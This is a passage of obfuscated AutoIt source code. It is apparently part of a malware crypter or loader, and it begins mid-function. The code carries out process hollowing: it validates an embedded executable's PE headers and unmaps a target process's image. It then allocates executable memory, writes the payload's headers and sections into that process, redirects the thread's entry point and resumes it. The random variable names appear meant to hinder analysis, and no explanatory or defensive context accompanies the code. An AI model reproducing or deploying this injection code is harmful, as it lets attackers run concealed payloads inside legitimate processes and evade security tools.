$RDPZAWDJPCVWFHXSHJUJ3 += DllStructGetData($UHUUUYDHZONNOYAAVAPL3, "AddressOfNewExeHeader")
Local $FUXEKOQCSLVFFYXRDWQJ6 = DllStructGetData($UHUUUYDHZONNOYAAVAPL3, "Magic")
If Not ($FUXEKOQCSLVFFYXRDWQJ6 == "MZ") Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(3, 0, 0)
EndIf
Local $CQJQRNZBEGRROZTQKLYH3 = DllStructCreate("dword Signature", $RDPZAWDJPCVWFHXSHJUJ3)
$RDPZAWDJPCVWFHXSHJUJ3 += 4
If DllStructGetData($CQJQRNZBEGRROZTQKLYH3, "Signature") <> 17744 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(4, 0, 0)
EndIf
Local $UGSSFCZLMKKQKJKHHKMV8 = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $RDPZAWDJPCVWFHXSHJUJ3)
Local $LSUMNEDTUHGGSAFJWXBG6 = DllStructGetData($UGSSFCZLMKKQKJKHHKMV8, "NumberOfSections")
$RDPZAWDJPCVWFHXSHJUJ3 += 20
Local $GCFXTWPIAEDVZDQPLTOY3 = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $RDPZAWDJPCVWFHXSHJUJ3)
$RDPZAWDJPCVWFHXSHJUJ3 += 96
Local $FIJIRSNJPLAJOIVBCMHE4PQDCEROSGAHRRBONTVS0 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "Magic")
If $FIJIRSNJPLAJOIVBCMHE4PQDCEROSGAHRRBONTVS0 <> 267 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(5, 0, 0)
EndIf
Local $BMRGXVFQWVPUONGXQEIV8 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "AddressOfEntryPoint")
$RDPZAWDJPCVWFHXSHJUJ3 += 128
Local $ETAMFTKFHXEATYABLIDV1 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "ImageBase")
Local $GVMQNZZNCJVDAJCALXYR6 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "SizeOfImage")
$FOADNRFSFHWOVGQYKWWB0 = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $ETAMFTKFHXEATYABLIDV1)
If @error Or $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(6, 0, 0)
EndIf
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $ETAMFTKFHXEATYABLIDV1, "dword", $GVMQNZZNCJVDAJCALXYR6, "dword", 12288, "dword", 64)
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(7, 0, 0)
EndIf
Local $RZVLCLCLBTZXORYFDDJP9 = $FOADNRFSFHWOVGQYKWWB0[0]
Local $SSCRUUOGKDHRXWJHLNVJ2 = DllStructGetPtr($UHUUUYDHZONNOYAAVAPL3)
Local $DQKEROXCGHKVJHIFPHVL4 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "SizeOfHeaders")
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $RZVLCLCLBTZXORYFDDJP9, "ptr", $SSCRUUOGKDHRXWJHLNVJ2, "dword", $DQKEROXCGHKVJHIFPHVL4, "dword*", 0)
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(8, 0, 0)
EndIf
Local $RJATWTKKNFETRTMFBJIO1
Local $KINPUJGTLNNGEYNXTNBY7, $EXJIJMOAEYYEQPBVEOZN0
Local $VHTUIZBBZGABQHZDVZOL7
For $FIJIRSNJPLAJOIVBCMHE4 = 1 To $LSUMNEDTUHGGSAFJWXBG6
$RJATWTKKNFETRTMFBJIO1 = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $RDPZAWDJPCVWFHXSHJUJ3)
$KINPUJGTLNNGEYNXTNBY7 = DllStructGetData($RJATWTKKNFETRTMFBJIO1, "SizeOfRawData")
$EXJIJMOAEYYEQPBVEOZN0 = DllStructGetPtr($UHUUUYDHZONNOYAAVAPL3) + DllStructGetData($RJATWTKKNFETRTMFBJIO1, "PointerToRawData")
$VHTUIZBBZGABQHZDVZOL7 = DllStructGetData($RJATWTKKNFETRTMFBJIO1, "VirtualAddress")
If $KINPUJGTLNNGEYNXTNBY7 Then
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $RZVLCLCLBTZXORYFDDJP9 + $VHTUIZBBZGABQHZDVZOL7, "ptr", $EXJIJMOAEYYEQPBVEOZN0, "dword", $KINPUJGTLNNGEYNXTNBY7, "dword*", 0)
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(9, $FIJIRSNJPLAJOIVBCMHE4, 0)
EndIf
EndIf
$RDPZAWDJPCVWFHXSHJUJ3 += 40
Next
DllStructSetData($DCSAQWEGABYFFEERANAQ6, "Eax", $RZVLCLCLBTZXORYFDDJP9 + $BMRGXVFQWVPUONGXQEIV8)
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $DVZXVGMITVHCYPEAORRM3, "ptr", DllStructGetPtr($DCSAQWEGABYFFEERANAQ6))
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(10, 0, 0)
EndIf
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $DVZXVGMITVHCYPEAORRM3)
If @error Or $FOADNRFSFHWOVGQYKWWB0[0] = -1 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(11, 0, 0)
EndIf
Return DllStructGetData($KTBXIKXYHPHPTXXBXBVK0, "ProcessId")
EndFunc